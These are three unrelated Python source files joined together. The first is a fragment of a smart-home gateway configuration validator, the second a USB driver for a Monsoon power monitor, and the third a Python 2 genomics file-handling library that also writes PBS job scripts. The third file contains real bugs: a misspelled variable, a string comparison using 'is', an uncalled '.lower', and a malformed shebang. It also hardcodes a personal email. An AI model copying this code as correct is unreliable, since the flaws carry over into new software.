return os.path.realpath(os.path.normcase(self.hass.config.path(path)))
async def validate_common(
self,
gw_type: ConfGatewayType,
errors: dict[str, str],
user_input: dict[str, Any],
) -> dict[str, str]:
"""Validate parameters common to all gateway types."""
errors.update(_validate_version(user_input[CONF_VERSION]))
if gw_type != CONF_GATEWAY_TYPE_MQTT:
if gw_type == CONF_GATEWAY_TYPE_TCP:
verification_func = is_socket_address
else:
verification_func = is_serial_port
try:
await self.hass.async_add_executor_job(
verification_func, user_input.get(CONF_DEVICE)
)
except vol.Invalid:
errors[CONF_DEVICE] = (
"invalid_ip"
if gw_type == CONF_GATEWAY_TYPE_TCP
else "invalid_serial"
)
if CONF_PERSISTENCE_FILE in user_input:
try:
is_persistence_file(user_input[CONF_PERSISTENCE_FILE])
except vol.Invalid:
errors[CONF_PERSISTENCE_FILE] = "invalid_persistence_file"
else:
real_persistence_path = user_input[
CONF_PERSISTENCE_FILE
] = self._normalize_persistence_file(user_input[CONF_PERSISTENCE_FILE])
for other_entry in self._async_current_entries():
if CONF_PERSISTENCE_FILE not in other_entry.data:
continue
if real_persistence_path == self._normalize_persistence_file(
other_entry.data[CONF_PERSISTENCE_FILE]
):
errors[CONF_PERSISTENCE_FILE] = "duplicate_persistence_file"
break
for other_entry in self._async_current_entries():
if _is_same_device(gw_type, user_input, other_entry):
errors["base"] = "already_configured"
break
# if no errors so far, try to connect
if not errors and not await try_connect(self.hass, gw_type, user_input):
errors["base"] = "cannot_connect"
return errors
|
|
import struct
from Monsoon import Operations as op
import ctypes
import platform
import usb.core
import usb.util
import numpy as np
import os
import platform
import time
class USB_protocol(object):
"""Uses native python usb functions to communicate with the Power Monitor.
Best choice for connecting to a single Power Monitor."""
def __init__(self):
self.DEVICE = None
def enumerateDevices(self):
"""Returns a list of the serial numbers of all devices connected to the system.
Includes both HVPM LVPM hardware"""
results = []
devices = usb.core.find(find_all=True, idVendor = 0x2AB9, idProduct = 0x0001)
for device in devices:
results.append(str(device.serial_number))
return results
def reconnect(self,deviceType, serialno):
"""Reset the port and reconnect to the power monitor.
Useful for some cases"""
self.DEVICE.reset()
time.sleep(5)
#give device time to re-enumerate
#TODO: We should be able to replace this with waiting for the event that fires when
#A new device enumerates on the system.
self.Connect(deviceType,serialno)
def Connect(self,deviceType, serialno=None):
"""Connect to a Power Monitor.
deviceType = LVPM or HVPM
serialno = device serial number. If None, connect to the first device found"""
def device_matcher(d):
try:
return d.idVendor == 0x2AB9 and d.idProduct == 0x0001 and (serialno is None or d.serial_number == str(serialno))
except:#Catches some platform-specific errors when connecting to multiple PMs simultaneously.
return False
self.DEVICE = usb.core.find(custom_match=device_matcher)
if (self.DEVICE is None):
print('Unable to find device')
return
connectedDeviceType = self.getValue(op.OpCodes.HardwareModel,2)
if(connectedDeviceType != deviceType):
print('warning: Device type mismatch. Found ' + repr(connectedDeviceType) + " expected " + repr(deviceType))
firmwareRev = self.getValue(op.OpCodes.FirmwareVersion,1)
if(firmwareRev < op.ReturnCodes.CURRENT_FIRMWARE_REV):
print('Warning: Detected firmware revision ' + repr(firmwareRev) + ", current release is " + repr(op.ReturnCodes.CURRENT_FIRMWARE_REV))
# On Linux we need to detach usb HID first
if "Linux" == platform.system():
try:
self.DEVICE.detach_kernel_driver(0)
except:
pass # already unregistered
self.DEVICE.set_configuration()
cfg = self.DEVICE.get_active_configuration()
intf = cfg[(0,0)]
self.epBulkWriter = usb.util.find_descriptor(
intf,
custom_match = \
lambda e: \
usb.util.endpoint_direction(e.bEndpointAddress) == \
usb.util.ENDPOINT_OUT)
self.epBulkReader = usb.util.find_descriptor(
intf,
custom_match = \
lambda e: \
usb.util.endpoint_direction(e.bEndpointAddress) == \
usb.util.ENDPOINT_IN)
def BulkRead(self):
return(self.DEVICE.read(0x81,64,timeout=1000))
def sendCommand(self,operation, value):
"""Send a USB Control transfer. Normally this is used to set an EEPROM value."""
if not self.verifyReady(operation):
self.stopSampling()
#TODO: We might smooth this behavior over later, but for now we want to explicitly fail if this occurs.
raise ValueError("Power Monitor Error, attempted to send a command while the unit is in Sample Mode.")
value = int(value)
value_array = struct.unpack("4B",struct.pack("I",value))
operation_array = struct.unpack("4b",struct.pack("I",operation))
wValue = struct.unpack("H",struct.pack("BB",value_array[0],value_array[1]))[0]
wIndex = struct.unpack("H",struct.pack("BB",operation_array[0],value_array[2]))[0]
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_SET_VALUE,wValue,wIndex,value_array,5000)
def stopSampling(self):
"""Send a control transfer instructing the Power Monitor to stop sampling."""
self.verifyReady(0x02)
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_REQUEST_STOP,0,0,0,5000)
def startSampling(self,calTime, maxTime):
"""Instruct the Power Monitor to enter sample mode.
calTime = Amount of time, in ms, between calibration samples.
maxTime = Number of samples to take before exiting sample mode automatically."""
if not self.verifyReady(0x02):
self.stopSampling()
raise ValueError("Power Monitor Error, attempted to start while already started.")
value_array = struct.unpack("4B",struct.pack("I",calTime))
maxtime_array = struct.unpack("4B",struct.pack("I",maxTime))
wValue = struct.unpack("H",struct.pack("BB",value_array[0],value_array[1]))[0]
wIndex = struct.unpack("H",struct.pack("BB",0,0))[0]
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_REQUEST_START,wValue,wIndex,maxtime_array,1000)
def resetToBootloader(self):
wValue = 0
wIndex = 0
wLength = 0
#This will cause a disconnect event, which throws an exception in libusb.
try:
self.DEVICE.ctrl_transfer(op.Control_Codes.USB_OUT_PACKET,op.Control_Codes.USB_REQUEST_RESET_TO_BOOTLOADER,wValue,wIndex,wLength,1000)
except:
print("Resetting to bootloader")
def getValue(self,operation,valueLength, signed = False):
"""Get an EEPROM value from the Power Monitor."""
operation_array = struct.unpack("4b",struct.pack("I",operation))
wIndex = struct.unpack("H",struct.pack("bb",operation_array[0],0))[0]
result = self.DEVICE.ctrl_transfer(op.Control_Codes.USB_IN_PACKET,op.Control_Codes.USB_SET_VALUE,0,wIndex,4,5000)
if(result == op.ReturnCodes.ERROR):
self.stopSampling()
raise ValueError("Error code returned. Attempted to query Power Monitor while in sample mode.")
if(valueLength == 4):
if(signed):
result = struct.unpack("i",result)[0]
else:
result = struct.unpack("I",result)[0]
elif(valueLength == 2):
if(signed):
result = struct.unpack("h",result[0:2])[0]
else:
result = struct.unpack("H",result[0:2])[0]
elif(valueLength == 1):
if(signed):
result = struct.unpack("b",result[0:1])[0]
else:
result = struct.unpack("B",result[0:1])[0]
return result
def closeDevice(self):
"""Cleanup any loose ends, if present."""
self.stopSampling()
self.DEVICE.reset() #Releases the bulk endpoint, which dispose_resources apparently doesn't release.
usb.util.dispose_resources(self.DEVICE)
def verifyReady(self,opcode):
"""Check whether we're currently in sample mode.
Some commands can cause errors if we are.
Current behavior checks for all opcodes, though there are some specific ones which will not return an error code."""
#Only check if the firmware version is 26 or greater
#getStartStatus command does not include 'Sample mode' bit before that revision.
firmwareRev = self.getValue(op.OpCodes.FirmwareVersion,1)
if(firmwareRev >= 26):
status = self.getValue(op.OpCodes.getStartStatus, 1)
return not np.bitwise_and(0x80,status)
else:
return True
class CPP_Backend_Protocol(object):
"""Uses C++ backend with libusb.
When connecting to multiple Power Monitors with the same computer, native Python code is often too slow, and results in many dropped samples.
This offloads the the time-critical parts of sample collection to C++, but isn't compatible with every OS yet.
"""
def __init__(self):
self.DEVICE = self.loadLibrary()
self.DEVICE.pySetup.argtypes = (ctypes.c_int, ctypes.c_int,ctypes.c_int)
self.DEVICE.pyStart.argtypes = (ctypes.c_int,ctypes.c_int)
self.DEVICE.pyGetBulkData.argtypes = (ctypes.c_int, ctypes.POINTER(ctypes.c_uint8))
self.DEVICE.pySendCommand.argtypes = (ctypes.c_ubyte, ctypes.c_int)
self.DEVICE.pyGetValue.argtypes = (ctypes.c_ubyte,ctypes.c_int)
self.queueSize = 1024
self.Queue = (ctypes.c_uint8*self.queueSize)()
ctypes.cast(self.Queue,ctypes.POINTER(ctypes.c_uint8))
def Connect(self,deviceType, serialno=None):
VID = 0x2AB9
PID = 0x0001
self.DEVICE.pySetup(VID,PID,serialno)
pass
def BulkRead(self):
self.DEVICE.pyGetBulkData(self.queueSize,self.Queue)
count = self.DEVICE.pyQueueCount()
result = self.Queue[0:count*64]
return result
def sendCommand(self,operation, value):
"""Send a USB Control transfer. Normally this is used to set an EEPROM value."""
self.DEVICE.pySendCommand(operation,int(value))
def stopSampling(self):
"""Send a control transfer instructing the Power Monitor to stop sampling."""
self.DEVICE.pyStop()
def startSampling(self,calTime, maxTime):
"""Instruct the Power Monitor to enter sample mode.
calTime = Amount of time, in ms, between calibration samples.
maxTime = Number of samples to take before exiting sample mode automatically."""
self.DEVICE.pyStart(calTime,maxTime)
def getValue(self,operation,valueLength):
"""Get an EEPROM value from the Power Monitor."""
return self.DEVICE.pyGetValue(operation,valueLength)
def closeDevice(self):
"""Cleanup any loose ends, if present."""
self.DEVICE.pyClose();
pass
def loadLibrary(self):
"""Tries to load the library in an OS-neutral way."""
#TODO: Currently we're distributing pre-compiled .dll and .so files.
#The proper way to do this will be including a makefile and compiling these libraries on installation.
path = os.path.abspath(__file__)
path = os.path.realpath(path)
path = os.path.dirname(path)
if(platform.system() == "Linux"):
libLocation=os.path.join(path,"Compiled/Linux/libcpp_backend.so")
elif(platform.system() is "Windows"):
libLocation = os.path.join(path,"Compiled//WIN32//Cpp_backend.dll")
else:
raise NotImplementedError("OS not currently supported.")
test = ctypes.CDLL(libLocation)
return test
def reconnect(self):
raise NotImplementedError
def findAllSerialNumbers(self):
raise NotImplementedError
|
|
#!/usr/bin/env python
'''
V2015-05-03
'''
import os
import csv
from itertools import ifilter
import sys
"""
COMMON FUNCTIONS
"""
def output_header_file_old(infile,skip,output_handle,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
for i in xrange(skip):
if len(sup_list)!=0:
initial_rows=reader.next()
rows=initial_rows+sup_list
else:
rows=reader.next()
if skip==0:
pass
else:
output_row(output_handle,rows,eliminate)
def output_column_descriptor(infile):
reader=csv.reader(open(infile,"rU"),delimiter="\t")
column_descriptor_list = []
for row in reader:
test2=row[0][0:2]
test1=row[0][0:1]
if test2=="##":
pass
elif test1=="#":
column_descriptor_list=row[:]
else:
break
return column_descriptor_list
def output_header_file(infile,output_handle,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
for row in reader:
test2=row[0][0:2]
test1=row[0][0:1]
if test2=="##":
output_row(output_handle,row)
elif test1=="#":
output_row(output_handle,row+sup_list)
else:
break
def output_header_VCF_file(infile,output_handle,cmd_record,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
first_line=True
description_output=False
for row in reader:
#if first_line!=True and (row[0][0:17]=="##fileformat=VCFv"):
# continue
if row[0][0:2]=="##":
if first_line and row[0][0:18]!="##fileformat=VCFv4":
output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row)
if cmd_record!="":
output_handle.write(cmd_record)
elif first_line and row[0][0:18]=="##fileformat=VCFv4":
output_row(output_handle,row)
if cmd_record!="":
output_handle.write(cmd_record)
else:
#output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row)
elif row[0][0]=="#" and row[0][1]!="#":
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
if eliminate==0:
combined_row=row+sup_list
else:
combined_row=row[:(-1)*eliminate]+sup_list
output_row(output_handle,combined_row)
description_output=True
else:
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
print "quit early"
break
first_line=False
if description_output==False:
description_list=["#CHRO","COOR","ID","REF","ALT","QUAL","FILTER","INFO","FORMAT"]
description_list=description_list+sup_list
output_row(output_handle,description_list)
def output_header_VCF_file_replace(infile,output_handle,cmd_record,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
first_line=True
for row in reader:
#if first_line!=True and (row[0][0:17]=="##fileformat=VCFv"):
# continue
if row[0][0:2]=="##":
if first_line and row[0][0:18]!="##fileformat=VCFv4":
output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row,eliminate)
if cmd_record!="":
output_handle.write(cmd_record)
elif first_line and row[0][0:18]=="##fileformat=VCFv4":
output_row(output_handle,row,eliminate)
if cmd_record!="":
output_handle.write(cmd_record)
else:
#output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row,eliminate)
elif row[0][0]=="#" and row[0][1]!="#":
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
#combined_row=row+sup_list
#output_row(output_handle,combined_row,eliminate)
else:
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
print "quit early"
break
first_line=False
def output_row(handle,row,eliminate=0):
##write row into files
len_row=len(row)-eliminate
for i in xrange(len_row):
if i==(len_row-1):
handle.write(str(row[i])+'\n')
else:
handle.write(str(row[i])+'\t')
def get_file_name(full_name):
if full_name.count("/")==0:
return full_name
else:
full_name_list=full_name.split("/")
return full_name_list[-1]
def get_path(full_name):
full_name_list=full_name.split("/")
full_name_len=len(full_name_list)
path=""
for index in range(1,full_name_len-1):
path=path+"/"+full_name_list[index]
return path
"""
COMMON FUNCTIONS
"""
class GeneralFile_class:
def __init__(self,name):
self.filename=name
self.name_only=get_file_name(name)
self.path_only=get_path(name)
self.SEP_CHAR='\t'
self.SKIP_HEADER=0
self.SAMPLE_ID_LEN=1 #this will determin how many section will be considered to be the unique ID
self.SAMPLE_ID_POS=0
self.UNIQUE_ID_COLUMN=0
self.FILENAME_SPLIT_CHAR='_'
self.RECORD=""
self.AUTOSKIP_HEADER=True
self.OUTPUT_PATH=os.getcwd()
#self.count_column_number()
def count_column_number(self):
reader=csv.reader(open(self.filename,'rU'),delimiter=self.SEP_CHAR)
rows=reader.next()
self.COLUMN_COUNT=len(rows)
def ID_frequency_dict_gen(self,COLUMN=2,FILEPATH=os.getcwd()):
if '/' in self.filename:
compete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for i in range(self.SKIP_HEADER):
reader.next()
ID_dict=dict()
for rows in reader:
ID=rows[COLUMN]
ID_dict[ID]=0
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for i in range(self.SKIP_HEADER):
reader.next()
for rows in reader:
ID=rows[COLUMN]
ID_dict[ID]+=1
return ID_dict
def generate_sample_id(self):
POS=self.SAMPLE_ID_POS
if '/' not in self.filename:
filename_list=(self.name_only).split(self.FILENAME_SPLIT_CHAR)
else:
infile_path_list=self.filename.split('/')
infile_name=infile_path_list[-1]
filename_list=infile_name.split(self.FILENAME_SPLIT_CHAR)
if self.SAMPLE_ID_LEN==1:
sample_id=filename_list[POS]
else:
filename_list_len=len(filename_list)
if self.SAMPLE_ID_LEN>filename_list_len:
self.SAMPLE_ID_LEN=filename_list_len
for i in range(self.SAMPLE_ID_LEN):
if i == 0 :
sample_id=filename_list[POS]
else:
sample_id+=self.FILENAME_SPLIT_CHAR+filename_list[POS+i]
return sample_id
def outputfilename_gen(self,name_fragment="std_out",suffix="txt",POS=0):
##version2.0
if '/' not in self.filename:
#infile_name_list=(self.filename).split(self.FILENAME_SPLIT_CHAR)
#sample_id=infile_name_list[POS]
sample_id=self.generate_sample_id()
output_filename=sample_id+"_"+name_fragment+'.'+suffix
return output_filename
else:
infile_path_list=self.filename.split('/')
infile_name=infile_path_list[-1]
print "infile_name",infile_name
#infile_name_list=(infile_name).split(self.FILENAME_SPLIT_CHAR)
#sample_id=infile_name_list[POS]
self.name_only=infile_name
sample_id=self.generate_sample_id()
output_filename=sample_id+"_"+name_fragment+'.'+suffix
return output_filename
def sampleID_gen(self):
##version2.0
if self.name_only.count("/")>0:
tmp_list=self.name_only.split("/")
self.name_only=tmp_list[-1]
tmp_list=(self.name_only).split(self.FILENAME_SPLIT_CHAR)
sampleID=tmp_list[self.SAMPLE_ID_POS]
return sampleID
def reader_gen(self,FILEPATH=os.getcwd()):
## this section solve the potential problem running on the PC, Need to implement more
if FILEPATH.count('\\')>0:
FILEPATH=FILEPATH.replace('\\','/')
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
if self.AUTOSKIP_HEADER==True and self.SKIP_HEADER==0:
## this will over-write provided default
skip_number=0
row=reader.next()
while row[0][0]=="#":
skip_number+=1
row=reader.next()
self.SKIP_HEADER=skip_number
#print "current skip header value is", self.SKIP_HEADER
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
for i in range(self.SKIP_HEADER):
reader.next()
return reader
def unique_ID_list_gen(self,reader,unique_ID_column):
unique_ID_list=[]
for row in reader:
unique_ID=row[unique_ID_column]
unique_ID_list.append(unique_ID)
return unique_ID_list
def unique_ID_list_gen_v2(self,reader,unique_ID_column):
## under development
unique_ID_list=[]
for row in reader:
unique_ID=row[unique_ID_column]
unique_ID_list.append(unique_ID)
return unique_ID_list
def output_handle_gen(self,header_file=None,FILEPATH=os.getcwd(),sup_list=[],HEAD_LINE=1):
##Version2.0
##Updated 2012-10-31
'''
header_file is the file contains the header information
FILEPATH is the path for the output file
sup_list is the additional annotations added to the output file header
HEAD_LINE is the number of header lines extracted from header file and writen into output file
'''
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
self.handle=open(complete_path,'w')
if self.RECORD=="":
pass
else:
self.handle.write(self.RECORD)
if header_file==None:
pass
else:
output_header_file(header_file,self.handle,sup_list,eliminate=0)
class SVDetectFile_class(GeneralFile_class):
##This file is SVDetect Subtype
SVDetect_CHRO1_COLUMN=0
SVDetect_START1_COLUMN=1
SVDetect_END1_COLUMN=2
SVDetect_CHRO2_COLUMN=3
SVDetect_START2_COLUMN=4
SVDetect_END2_COLUMN=5
SVDetect_TYPE_COLUMN=16
SEP_CHAR='\t'
SKIP_HEADER=0
DIST_THRESHOLD=1000
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.SKIP_HEADER=0
self.CHRO2_COLUMN=3
self.CHRO1_COLUMN=0
self.START1_COLUMN=1
self.END1_COLUMN=2
self.START2_COLUMN=4
self.END2_COLUMN=5
self.ID_COLUMN=-1
def region1_output(self):
return None
def reader_gen(self,FILEPATH=os.getcwd()):
complete_path=FILEPATH + '/' + self.filename
#print "complete_path",complete_path
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for i in range(self.SKIP_HEADER):
reader.next()
return reader
def filter_chro(self,infile_reader,filter_chro,eliminate_ID):
data_dict=dict()
data_list=[]
previous_point=0
for rows in infile_reader:
chro=rows[self.CHRO2_COLUMN]
ID=rows[self.ID_COLUMN]
if filter_chro==chro and ID!=eliminate_ID:
start1=rows[self.START1_COLUMN]
end1=rows[self.END1_COLUMN]
middle_point=int((int(start1)+int(end1))/2)
if previous_point==middle_point:
middle_point+=0.1
previous_point=middle_point
data_dict[middle_point]=rows
data_list.append(middle_point)
#print "data_list,",data_list
'''
for data in data_list:
if data_list.count(data) > 1:
print "Same cooridnate ocurrs, Fix needed"
sys.exit()
'''
data_list.sort()
#print "sorted_data", sorted_data
#print "data_dict", data_dict
return data_list,data_dict
class BEDFile_class(GeneralFile_class):
SEP_CHAR='\t'
# this class can be used for BedGraph format as well
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.SKIP_HEADER=0
self.CHRO_COLUMN=0
self.START_COLUMN=1
self.END_COLUMN=2
self.ID_COLUMN=3
self.SCORE_COLUMN=4
self.STRAND_COLUMN=5
class Indel_GATK_File_class(BEDFile_class):
def __init__(self,name):
BEDFile_class.__init__(self,name)
self.TUMOR_STRAND_COLUMN=17
self.TUMOR_STRAND_COLUMN_SEP=':'
self.TUMOR_STRAND_COLUMN_INFO=1
self.INDEL_COLUMN=3
self.GENE_COLUMN=-1
self.FREQ_COLUMN=21
self.SKIP_HEADER=1
##Not sure why there is a blank column there in the data
class VCF_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.QUAL_COLUMN=5
self.ALT_COLUMN=4
self.REF_COLUMN=3
self.ID_COLUMN=2
self.COOR_COLUMN=1
self.CHRO_COLUMN=0
self.FILTER_COLUMN=6
self.INFO_COLUMN=7
self.FORMAT_COLUMN=8
self.SKIP_HEADER=0
self.SEP_INFO_START_COLUMN=9
self.ALT_SEP_CHAR=','
self.REPLACE_DESCRIPTION=0
self.DESCRIPTION_COLUMN_REMOVAL=0
def check_header(self,FILEPATH=os.getcwd()):
##check the description column and first column
result=0
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for row in reader:
if row[0][0]!="#":
break
else:
if row[0][1:6].upper()=="CHROM":
result=1
return result
def sample_list_gen(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for rows in reader:
first_item=rows[0]
if first_item[0]=='#' and first_item[1]!='#':
sample_list=rows[self.SEP_INFO_START_COLUMN:]
break
else:
pass
return sample_list
def reader_gen(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
skip_count=0
try:
rows=reader.next()
while rows[0][0]=="#":
skip_count+=1
rows=reader.next()
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
for i in range(skip_count):
reader.next()
except:
pass
return reader
def output_sample_info(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
for rows in reader:
if rows[0][0:2]=="##":
pass
else:
sample_info=rows[9:]
break
return sample_info
def output_handle_gen(self,header_file=None,FILEPATH=os.getcwd(),sup_list=[],HEAD_LINE=1):
##Version2.0
##Updated 2012-10-31
'''
header_file is the file contains the header information
FILEPATH is the path for the output file
sup_list is the additional annotations added to the output file header
HEAD_LINE is the number of header lines extracted from header file and writen into output file
'''
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
self.handle=open(complete_path,'w')
if header_file==None:
self.handle.write("##fileformat=VCFv4\n")
if self.RECORD=="":
pass
else:
self.handle.write(self.RECORD)
pass
else:
#output_header_file(header_file,self.handle,sup_list,eliminate=0)
if self.REPLACE_DESCRIPTION==0:
##
output_header_VCF_file(header_file,self.handle,self.RECORD,sup_list,eliminate=self.DESCRIPTION_COLUMN_REMOVAL)
else:
output_header_VCF_file_replace(header_file,self.handle,self.RECORD,sup_list,eliminate=self.DESCRIPTION_COLUMN_REMOVAL)
def sample_count(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
sample_count=0
for rows in reader:
if rows[0][0]=="#":
pass
else:
sample_info=rows[9:]
for sample_data in sample_info:
if sample_data.count(":")==2:
sample_count+=1
elif sample_data=="./.":
sample_count+=1
else:
pass
break
return sample_count
def variant_list_gen(self):
variant_dict=dict()
infile_reader=self.reader_gen()
for row in infile_reader:
chro=row[self.CHRO_COLUMN]
coor=row[self.COOR_COLUMN]
ref=row[self.REF_COLUMN]
alt=row[self.ALT_COLUMN]
unique_ID=chro+"_"+coor+"_"+ref+"_"+alt
variant_dict[unique_ID]=[]
return variant_dict
def add_to_filter_column(self,vcf_row,additional_filter):
current_filter=vcf_row[self.FILTER_COLUMN]
new_filter=current_filter+";" + additional_filter
new_vcf_row=vcf_row[:]
new_vcf_row[self.FILTER_COLUMN]=new_filter
return new_vcf_row
class PBS_File_class(GeneralFile_class):
def __init__(self,name,path=os.getcwd()):
GeneralFile_class.__init__(self,name)
self.email="zhangliy@bu.edu"
self.memory="2g"
self.suffix='pbs'
self.PROJECT="montilab-p"
self.MACHINE="scc"
self.RUNTIME_LIMIT="96:00:00"
#self.
#GeneralFile_class.output_handle_gen(self,FILEPATH=path)
def output_pbs(self,command_line_list):
self.output_handle_gen()
if self.MACHINE=="scc":
self.handle.write("source ~/.bashrc\n")
self.handle.write("#!bin/bash\n")
self.handle.write("#$ -l h_rt="+self.RUNTIME_LIMIT+'\n')
self.handle.write("\n")
else:
self.handle.write("#!bin/bash\n")
self.handle.write("#\n")
self.handle.write("\n")
self.handle.write("#Specify which shell to use\n")
self.handle.write("#$ -S /bin/bash\n")
self.handle.write("\n")
self.handle.write("#Run on the current working folder\n")
self.handle.write("#$ -cwd\n")
self.handle.write("\n")
self.handle.write("#Given this job a name\n")
if self.filename.count("/")>=1:
filename_info_list=self.filename.split("/")
filename_info=filename_info_list[-1]
else:
filename_info=self.filename
self.handle.write("#$ -N S"+filename_info+'\n')
self.handle.write("\n")
self.handle.write("#Join standard output and error to a single file\n")
self.handle.write("#$ -j y\n")
self.handle.write("\n")
self.handle.write("# Name the file where to redict standard output and error\n")
if self.filename.count("/")>=1:
filename_info_list=self.filename.split("/")
filename_info=filename_info_list[-1]
else:
filename_info=self.filename
self.handle.write("#$ -o "+ filename_info +".qlog\n")
self.handle.write("\n")
self.handle.write("# Project this job belongs to \n")
self.handle.write("#$ -P " + self.PROJECT+ " \n")
self.handle.write("\n")
self.handle.write("# Send an email when the job begins and when it ends running\n")
self.handle.write("#$ -m be\n")
self.handle.write("\n")
if (self.email).lower!="no":
self.handle.write("# Whom to send the email to\n")
self.handle.write("#$ -M "+self.email+ "\n")
self.handle.write("\n")
self.handle.write("# memory usage\n")
self.handle.write("#$ -l mem_free="+self.memory+ "\n")
self.handle.write("\n")
self.handle.write("# Now let's Keep track of some information just in case anything go wrong\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.write("echo "+'"'+"Starting on : $(date)"+'"'+ "\n")
self.handle.write("echo "+'"'+"Running on node : $(hostname)"+'"'+"\n")
self.handle.write("echo "+'"'+"Current directory : $(pwd)"+'"'+"\n")
self.handle.write("echo "+'"'+"Current job ID : $JOB_ID"+'"'+"\n")
self.handle.write("echo "+'"'+"Current job name : $JOB_NAME"+'"'+"\n")
self.handle.write("echo "+'"'+"Task index number : $TASK_ID"+'"'+"\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.write("\n")
for command_line in command_line_list:
self.handle.write(command_line)
self.handle.write('\n')
self.handle.write("\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.write("echo "+'"'+"Finished on : $(date)"+'"'+ "\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.close()
class PSL_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.MATCH_COLUMN=0
self.MISMATCH_COLUMN=1
self.QUERY_INSERTION_COUNT_COLUMN=4
self.QUERY_INSERTION_LEN_COLUMN=5
self.REF_INSERTION_COUNT_COLUMN=6
self.REF_INSERTION_LEN_COLUMN=7
self.STRAND_COLUMN=8
self.QUERY_ID_COLUMN=9
self.QUERY_LEN_COLUMN=10
self.QUERY_START_COLUMN=11
self.QUERY_END_COLUMN=12
self.REF_ID_COLUMN=13
self.REF_LEN_COLUMN=14
self.REF_START_COLUMN=15
self.REF_END_COLUMN=16
self.BLOCK_COUNT_COLUMN=17
self.BLOCK_SIZE_COLUMN=18
self.QUERY_STARTS_COLUMN=19
self.REF_STARTS_COLUMN=20
self.AUTOSKIP_HEADER=False
self.SKIP_HEADER=5
def output_handle_gen(self,header_file=None,FILEPATH=os.getcwd(),sup_list=[],HEAD_LINE=1):
##Version2.0
##Updated 2012-10-31
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
self.handle=open(complete_path,'w')
if self.RECORD=="":
pass
else:
self.handle.write(self.RECORD)
reader=csv.reader(open(header_file,"rU"),delimiter="\t")
for index in range(self.SKIP_HEADER):
row=reader.next()
output_row(self.handle,row)
if index==0:
self.handle.write('\n')
class SAM_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.QNAME_COLUMN=0
self.FLG_COLUMN=1
self.CHRO_COLUMN=2
self.COOR_COLUMN=3
self.MAPQ_COLUMN=4
self.CIGAR_COLUMN=5
self.RNEXT_COLUMN=6
self.PNEXT_COLUMN=7
self.TLEN_COLUMN=8
self.SEQ_COLUMN=9
self.QUAL_COLUMN=10
self.READGROUP_COLUMN=12
self.MULTI_ALIGNMENT_COLUMN=12 ## for the new bwa result version at least
self.SKIP_HEADER=0
def reader_gen(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
if self.AUTOSKIP_HEADER==True:
## this will over-write provided default
skip_number=0
row=reader.next()
while row[0][0]=="@":
skip_number+=1
row=reader.next()
self.SKIP_HEADER=skip_number
